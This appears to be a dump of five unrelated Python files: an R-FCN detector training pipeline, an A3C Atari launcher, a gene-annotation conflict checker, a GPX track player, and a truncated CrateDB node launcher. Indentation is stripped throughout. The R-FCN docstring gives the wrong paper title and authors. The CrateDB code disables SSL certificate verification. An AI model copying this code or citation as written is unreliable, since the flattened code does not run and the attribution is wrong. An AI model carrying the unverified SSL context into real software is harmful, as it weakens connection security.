train_rfcn_alt_opt_5stage.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# R-FCN
# Copyright (c) 2016 Yuwen Xiong, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
"""Train a R-FCN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("R-FCN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals, imdb_rpn_compute_stats
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import pickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train an R-FCN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ResNet-101")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--imdb_test', dest='imdb_test_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--model', dest='model_name',
help='folder name of model',
default=None, type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print('Loaded dataset `{:s}` for training'.format(imdb.name))
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print('Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD))
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(imdb_name, net_name, model_name):
# R-FCN Alternating Optimization
# Solver for each training stage
if imdb_name.startswith('coco'):
solvers = [[net_name, model_name, 'stage1_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage1_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage2_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage2_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage3_rpn_solver360k480k.pt']]
solvers = [os.path.join('.', 'models', 'coco', *s) for s in solvers]
# Iterations for each training stage
max_iters = [480000, 480000, 480000, 480000, 480000]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
'.', 'models', 'coco', net_name, model_name, 'rpn_test.pt')
else:
solvers = [[net_name, model_name, 'stage1_rpn_solver60k80k.pt'],
[net_name, model_name, 'stage1_rfcn_ohem_solver80k120k.pt'],
[net_name, model_name, 'stage2_rpn_solver60k80k.pt'],
[net_name, model_name, 'stage2_rfcn_ohem_solver80k120k.pt'],
[net_name, model_name, 'stage3_rpn_solver60k80k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [80000, 120000, 80000, 120000, 80000]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, model_name, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
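# For example (illustrative values, assuming net_name='ResNet-101' and
# model_name='rfcn_alt_opt_5step_ohem' on PASCAL VOC), this returns solver
# paths such as
#   <MODELS_DIR>/ResNet-101/rfcn_alt_opt_5step_ohem/stage1_rpn_solver60k80k.pt
# together with max_iters = [80000, 120000, 80000, 120000, 80000].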
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, output_cache=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to R-FCN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print('Init model: {}'.format(init_model))
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print('roidb len: {}'.format(len(roidb)))
output_dir = get_output_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
final_caffemodel = os.path.join(output_dir, output_cache)
if os.path.exists(final_caffemodel):
queue.put({'model_path': final_caffemodel})
else:
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
shutil.copyfile(rpn_model_path, final_caffemodel)
queue.put({'model_path': final_caffemodel})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = 6000 # keep the top 6000 boxes before NMS
cfg.TEST.RPN_POST_NMS_TOP_N = 300 # keep the top 300 boxes after NMS
print('RPN model: {}'.format(rpn_model_path))
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print('Loaded dataset `{:s}` for proposal generation'.format(imdb.name))
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
# Generate proposals on the imdb
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
if not os.path.exists(rpn_proposals_path):
rpn_proposals = imdb_proposals(rpn_net, imdb)
with open(rpn_proposals_path, 'wb') as f:
pickle.dump(rpn_proposals, f, pickle.HIGHEST_PROTOCOL)
queue.put({'proposal_path': rpn_proposals_path})
print('Wrote RPN proposals to {}'.format(rpn_proposals_path))
def train_rfcn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None, output_cache=None):
"""Train a R-FCN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating proposals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 1
print('Init model: {}'.format(init_model))
print('RPN proposals: {}'.format(rpn_file))
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
# Train R-FCN
# Send R-FCN model path over the multiprocessing queue
final_caffemodel = os.path.join(output_dir, output_cache)
if os.path.exists(final_caffemodel):
queue.put({'model_path': final_caffemodel})
else:
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rfcn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
shutil.copyfile(rfcn_model_path, final_caffemodel)
queue.put({'model_path': final_caffemodel})
def rpn_compute_stats(queue=None, imdb_name=None, cfg=None, rpn_test_prototxt=None):
"""Compute mean stds for anchors
"""
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to R-FCN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
roidb, imdb = get_roidb(imdb_name)
print('Loaded dataset `{:s}` for proposal generation'.format(imdb.name))
mean_file = os.path.join(imdb.cache_path, imdb.name + '_means.npy')
std_file = os.path.join(imdb.cache_path, imdb.name + '_stds.npy')
if os.path.exists(mean_file) and os.path.exists(std_file):
means = np.load(mean_file)
stds = np.load(std_file)
else:
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, caffe.TEST)
# Generate proposals on the imdb
print('start computing means/stds, it may take several minutes...')
if imdb_name.startswith('coco'):
means, stds = imdb_rpn_compute_stats(rpn_net, imdb, anchor_scales=(4, 8, 16, 32))
else:
means, stds = imdb_rpn_compute_stats(rpn_net, imdb, anchor_scales=(8, 16, 32))
np.save(mean_file, means)
np.save(std_file, stds)
queue.put({'means': means, 'stds': stds})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
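# Each stage below follows the same pattern (a sketch of the code that follows):
#   p = mp.Process(target=stage_fn, kwargs=dict(queue=mp_queue, ...))
#   p.start()
#   stage_out = mp_queue.get()   # blocks until the child posts its result
#   p.join()                     # the child exits, releasing its GPU memory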
# queue for communicating results between processes
mp_queue = mp.Queue()
# solvers, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.imdb_name, args.net_name, args.model_name)
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 0 RPN, compute normalization means and stds')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_compute_stats, kwargs=mp_kwargs)
p.start()
stage0_anchor_stats = mp_queue.get()
p.join()
cfg.TRAIN.RPN_NORMALIZE_MEANS = stage0_anchor_stats['means']
cfg.TRAIN.RPN_NORMALIZE_STDS = stage0_anchor_stats['stds']
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 RPN, init from ImageNet model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg,
output_cache='stage1_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 RPN, generate proposals')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 RPN, generate proposals on the test set')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 R-FCN using RPN proposals, init from ImageNet model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'],
output_cache='stage1_rfcn_final.caffemodel')
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage1_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 2 RPN, init from stage1 R-FCN model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rfcn_stage1_out['model_path']),
solver=solvers[2],
max_iters=max_iters[2],
cfg=cfg,
output_cache='stage2_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 2 RPN, generate proposals')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 2 R-FCN using Stage-2 RPN proposals, init from ImageNet model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'],
output_cache='stage2_rfcn_final.caffemodel')
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage2_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 3 RPN, init from stage2 R-FCN model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage3'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rfcn_stage2_out['model_path']),
solver=solvers[4],
max_iters=max_iters[4],
cfg=cfg,
output_cache='stage3_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage3_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 3 RPN, generate test proposals only')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage3_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage3_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('Final model: {}'.format(str(rfcn_stage2_out['model_path'])))
print('Final RPN proposals: {}'.format(str(rpn_stage3_out['test_proposal_path'])))
|
main.py
|
from __future__ import print_function, division
import os
os.environ["OMP_NUM_THREADS"] = "1"
import argparse
import torch
import torch.multiprocessing as mp
from environment import atari_env
from utils import read_config
from model import A3Clstm
from train import train
from test import test
from shared_optim import SharedRMSprop, SharedAdam
from torchsummary import summary
#from gym.configuration import undo_logger_setup
import time
#undo_logger_setup()
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument(
'--lr',
type=float,
default=0.0001,
metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument(
'--gamma',
type=float,
default=0.99,
metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument(
'--tau',
type=float,
default=1.00,
metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument(
'--seed',
type=int,
default=1,
metavar='S',
help='random seed (default: 1)')
parser.add_argument(
'--workers',
type=int,
default=32,
metavar='W',
help='how many training processes to use (default: 32)')
parser.add_argument(
'--num-steps',
type=int,
default=20,
metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument(
'--max-episode-length',
type=int,
default=10000,
metavar='M',
help='maximum length of an episode (default: 10000)')
parser.add_argument(
'--env',
default='Pong-v0',
metavar='ENV',
help='environment to train on (default: Pong-v0)')
parser.add_argument(
'--env-config',
default='config.json',
metavar='EC',
help='config file with environment crop and resize info (default: config.json)')
parser.add_argument(
'--shared-optimizer',
default=False,
metavar='SO',
help='use an optimizer with shared statistics.')
parser.add_argument(
'--load', default=False, metavar='L', help='load a trained model')
parser.add_argument(
'--save-max',
default=True,
metavar='SM',
help='save the model on every test run where the high score is matched or bested')
parser.add_argument(
'--optimizer',
default='Adam',
metavar='OPT',
help='shared optimizer choice: Adam or RMSprop')
parser.add_argument(
'--load-model-dir',
default='trained_models/',
metavar='LMD',
help='folder to load trained models from')
parser.add_argument(
'--save-model-dir',
default='trained_models/',
metavar='SMD',
help='folder to save trained models')
parser.add_argument(
'--log-dir', default='logs/', metavar='LG', help='folder to save logs')
parser.add_argument(
'--gpu-ids',
type=int,
default=-1,
nargs='+',
help='GPUs to use [-1 CPU only] (default: -1)')
parser.add_argument(
'--amsgrad',
default=True,
metavar='AM',
help='Adam optimizer amsgrad parameter')
parser.add_argument(
'--skip-rate',
type=int,
default=4,
metavar='SR',
help='frame skip rate (default: 4)')
# Training settings based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Multiprocessing with locks was also implemented but was not beneficial;
# Hogwild! training was far superior.
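# Here Hogwild! means that shared_model.share_memory() below places the model
# parameters in shared memory and every worker process updates them without
# any locking.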
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
if args.gpu_ids == -1:
args.gpu_ids = [-1]
else:
torch.cuda.manual_seed(args.seed)
mp.set_start_method('spawn')
setup_json = read_config(args.env_config)
env_conf = setup_json["Default"]
for i in setup_json.keys():
if i in args.env:
env_conf = setup_json[i]
env = atari_env(args.env, env_conf, args)
shared_model = A3Clstm(env.observation_space.shape[0],
env.action_space)
#summary(shared_model, (1, 80, 80))
if args.load:
saved_state = torch.load(
'{0}{1}.dat'.format(args.load_model_dir, args.env),
map_location=lambda storage, loc: storage)
shared_model.load_state_dict(saved_state)
shared_model.share_memory()
if args.shared_optimizer:
if args.optimizer == 'RMSprop':
optimizer = SharedRMSprop(shared_model.parameters(), lr=args.lr)
if args.optimizer == 'Adam':
optimizer = SharedAdam(
shared_model.parameters(), lr=args.lr, amsgrad=args.amsgrad)
optimizer.share_memory()
else:
optimizer = None
processes = []
p = mp.Process(target=test, args=(args, shared_model, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for rank in range(0, args.workers):
p = mp.Process(
target=train, args=(rank, args, shared_model, optimizer, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for p in processes:
time.sleep(0.1)
p.join()
|
conflictedARGsClass.py
|
import json
from pymongo import MongoClient
import sys
import requests
import networkx as nx
# from rest.DataBaseInterface.DataBaseClass import DataBase
import threading
class ConflictedARGs():
def __init__(self, DataBase):
self.database = DataBase
self.table = 'master'
self.secondaryTable = 'conflicted_genes'
def run(self):
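# Build a directed graph with edges subtype -> annotated class, weighted by the
# number of gene entries supporting that pairing; subtypes whose best hits map
# to more than one class are reported as conflicts below.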
G = nx.DiGraph()
subtype = {}
for i in self.database.find(self.table, {}):
# make sure that the entry is not inspected. If it is already inspected, jump to the next gene.
# try:
# i['entry']['inspected']
# except:
# continue
try:
for j in i['besthit']['alignments']:
if j['bitscore'] < 50 or j['algn_len']/float(i['entry']['length']) < 0.9 or j['identity'] < 60: continue
if j['best_hit_database'] in ['CARD', 'ARDB']:
nodex = j['metadata']['subtype'].upper()
nodey = i['entry']['type']
else:
nodex = j['subtype'].upper()
nodey = i['entry']['type']
try:
G[nodex][nodey]['weight'] += 1
G[nodex][nodey]['gene_id'].append(i['entry']['gene_id'])
except:
G.add_edge(nodex, nodey, weight=1, gene_id=[i['entry']['gene_id']])
subtype[nodex] = True
except:
pass
# H=nx.DiGraph( [ (u,v,d) for u,v,d in G.edges(data=True) if d ['weight']>1] )
cg = [[i,G[i]] for i in subtype if len(G[i])>1]
stu = self.database.delete(self.secondaryTable, {})
for i in cg:
self.database.insert(
self.secondaryTable,
{
"subtype": i[0],
"conflict": [{"class":k, "genes":list(set(i[1][k]['gene_id']))} for k in i[1] ]
}
)
# return {"status": True}
def runBackground(self):
process = threading.Thread(target=self.run, args=())
process.start()
return {"status": True}
|
gpx_example.py
|
from ftssim import gpx
from threading import Thread
player = gpx.GpxPlayer('192.168.3.2', 'test_file.gpx', "A1_Walk", speed_kph=5, max_time_step_secs=4)
player2 = gpx.GpxPlayer('192.168.3.2', 'test.gpx', "A2_Walk", speed_kph=5, max_time_step_secs=4, repeated_objects=5)
# Set up a thread for each player
player_thread = Thread(target=player.play_gpx)
player2_thread = Thread(target=player2.play_gpx)
# Start each thread
player_thread.start()
player2_thread.start()
# Kick off player 2 with its repeated objects
player2.play_gpx_multiple()
def print_info(wnd, thread):
print(f"""
_________________________________________________
+ {wnd.callsign} is Running +
+ File: {wnd.filename} +
+ Process ID: {thread.native_id} +
+ UID: {wnd.uid} +
+ Server: {wnd.tak_server}:{wnd.tak_port} +
+ Speed: {wnd.speed_kph}Kph +
_________________________________________________""")
# Print useful information about each wanderer to the terminal
print_info(player, player_thread)
print_info(player2, player2_thread)
|
run_crate.py
|
import argh
import os
import json
import re
import subprocess
import tempfile
import sys
import shutil
import contextlib
import logging
import random
import time
import gzip
import io
import tarfile
import threading
import fnmatch
import socket
import ssl
import platform
from datetime import datetime
from hashlib import sha1
from pathlib import Path
from functools import partial
from itertools import cycle
from typing import Optional, Dict, Any, List, NamedTuple
from urllib.request import urlopen
from cr8.java_magic import find_java_home
from cr8.misc import parse_version, init_logging
from cr8.engine import DotDict
from cr8.exceptions import ArgumentError
log = logging.getLogger(__name__)
NO_SSL_VERIFY_CTX = ssl._create_unverified_context()
RELEASE_URL = 'https://cdn.crate.io/downloads/releases/crate-{version}.tar.gz'
RELEASE_PLATFORM_URL = 'https://cdn.crate.io/downloads/releases/cratedb/{arch}_{os}/crate-{version}.{extension}'
VERSION_RE = re.compile(r'^(\d+\.\d+\.\d+)$')
DYNAMIC_VERSION_RE = re.compile(r'^((\d+|x)\.(\d+|x)\.(\d+|x))$')
BRANCH_VERSION_RE = re.compile(r'^((\d+)\.(\d+))$')
FOLDER_VERSION_RE = re.compile(r'crate-(\d+\.\d+\.\d+)')
REPO_URL = 'https://github.com/crate/crate.git'
DEFAULT_SETTINGS = {
'discovery.initial_state_timeout': 0,
'network.host': '127.0.0.1',
'udc.enabled': False
}
class ReleaseUrlSegments(NamedTuple):
arch: str
os: str
extension: str
@classmethod
def create(cls):
extension = 'tar.gz'
if sys.platform.startswith('linux'):
os = 'linux'
elif sys.platform.startswith('win32'):
os = 'windows'
extension = 'zip'
elif sys.platform.startswith('darwin'):
os = 'mac'
else:
raise ValueError(f'Unsupported platform: {sys.platform}')
machine = platform.machine()
if machine.startswith('arm'):
arch = 'aarch64'
else:
arch = 'x64'
return ReleaseUrlSegments(arch=arch, os=os, extension=extension)
@property
def platform_key(self):
return f'{self.arch}_{self.os}'
def get_uri(self, version):
return RELEASE_PLATFORM_URL.format(
version=version,
os=self.os,
extension=self.extension,
arch=self.arch
)
def _format_cmd_option_legacy(k, v):
return '-Des.{0}={1}'.format(k, v)
def _format_cmd_option(k, v):
if isinstance(v, bool):
return '-C{0}={1}'.format(k, str(v).lower())
return '-C{0}={1}'.format(k, v)
def _extract_version(crate_dir) -> tuple:
m = FOLDER_VERSION_RE.findall(crate_dir)
if m:
return parse_version(m[0])
return (1, 0, 0)
class OutputMonitor:
def __init__(self):
self.consumers = []
def _consume(self, proc):
try:
for line in proc.stdout:
for consumer in self.consumers:
if callable(consumer):
consumer(line)
else:
consumer.send(line)
except Exception:
if proc.returncode is not None:
return
raise
def start(self, proc):
out_thread = threading.Thread(target=self._consume, args=(proc,))
out_thread.daemon = True
out_thread.start()
class Timeout:
def __init__(self, timeout, sleep=0.1):
self.start_time = time.time()
self.sleep = sleep
self._first_ok = True
self.timeout = timeout
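# The first call is always treated as "not expired" so that wait_until's
# predicate gets at least one chance to run, even with a very small timeout.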
def timeout_expired():
if self._first_ok:
self._first_ok = False
return False
now = time.time()
if (now - self.start_time) > self.timeout:
return True
if self.sleep:
time.sleep(self.sleep)
self._timeout_expired = timeout_expired
def __call__(self):
if self._timeout_expired():
raise TimeoutError()
return True
def wait_until(predicate, timeout=30):
"""Wait until predicate returns a truthy value or the timeout is reached.
>>> wait_until(lambda: True, timeout=10)
"""
not_expired = Timeout(timeout)
while not_expired():
r = predicate()
if r:
break
def _is_up(host: str, port: int):
try:
conn = _create_connection(host, port)
conn.close()
return True
except (socket.gaierror, ConnectionRefusedError):
return False
def _create_connection(host: str, port: int):
if host[0] == '[' and host[-1] == ']':
host = host[1:-1]
return socket.create_connection((host, port))
def _has_ssl(host: str, port: int):
try:
with NO_SSL_VERIFY_CTX.wrap_socket(_create_connection(host, port)) as s:
s.close()
return True
except (socket.gaierror, ssl.SSLError):
return False
def cluster_state_200(url):
try:
with urlopen(url, context=NO_SSL_VERIFY_CTX) as r:
p = json.loads(r.read().decode('utf-8'))
return int(p['status']) == 200
except Exception as e:
log.debug(e)
return False
def _get_settings(settings=None) -> Dict[str, Any]:
s = DEFAULT_SETTINGS.copy()
if settings:
s.update(settings)
return s
def _try_print_log(logfile):
try:
with open(logfile) as f:
for line in f:
log.error(line)
except Exception:
pass
def _ensure_running(proc):
result = proc.poll()
if result:
raise SystemExit('Process exited: ' + str(result))
return True
class CrateNode(contextlib.ExitStack):
"""Class that allows starting and stopping a Crate process
This is similar to the ``CrateLayer`` in ``crate.testing.layer``.
But additionaly it supports setting environment variables and it can infer
the port to which Crate binds by sniffing Crate's stdout.
Attributes:
http_url: The HTTP URL of the Crate process.
Only available after ``start()`` has been called.
process: The subprocess. Only available after ``start()`` has been called.
"""
def __init__(self,
crate_dir: str,
env: Dict[str, Any] = None,
settings: Dict[str, Any] = None,
keep_data: bool = False,
java_magic: bool = False,
version: tuple = None) -> None:
"""Create a CrateNode
Args:
crate_dir: Path to the extracted Crate tarball
env: Environment variables with which the Crate process will be
started.
settings: Additional Crate settings.
java_magic: If set to true, it will attempt to set JAVA_HOME to
some path that contains a Java version suited to run the given
CrateDB instance.
version:
The CrateDB version as tuple in the format (major, minor, hotfix).
This is usually inferred from the given `crate_dir`, but can be
passed explicitly to overrule the detection mechanism.
This argument is used to provide the right defaults and use the
right commandline argument syntax to launch CrateDB.
"""
super().__init__()
self.crate_dir = crate_dir
self.version = version or _extract_version(crate_dir)
self.env = env or {}
if java_magic:
java_home = find_java_home(self.version)
else:
java_home = os.environ.get('JAVA_HOME', '')
self.env.setdefault('JAVA_HOME', java_home)
self.env.setdefault('LANG',
os.environ.get('LANG', os.environ.get('LC_ALL')))
if not self.env['LANG']:
raise SystemExit('Your locale is not configured correctly. '
'Please set LANG or alternatively LC_ALL.')
self.monitor = OutputMonitor()
self.process = None # type: Optional[subprocess.Popen]
self.http_url = None # type: Optional[str]
self.http_host = None # type: Optional[str]
start_script = 'crate.bat' if sys.platform == 'win32' else 'crate'
settings = _get_settings(settings)
if self.version < (1, 1, 0):
settings.setdefault('discovery.zen.ping.multicast.enabled', False)
self.data_path = settings.get('path.data') or tempfile.mkdtemp()
self.logs_path = settings.get('path.logs') or os.path.join(crate_dir, 'logs')
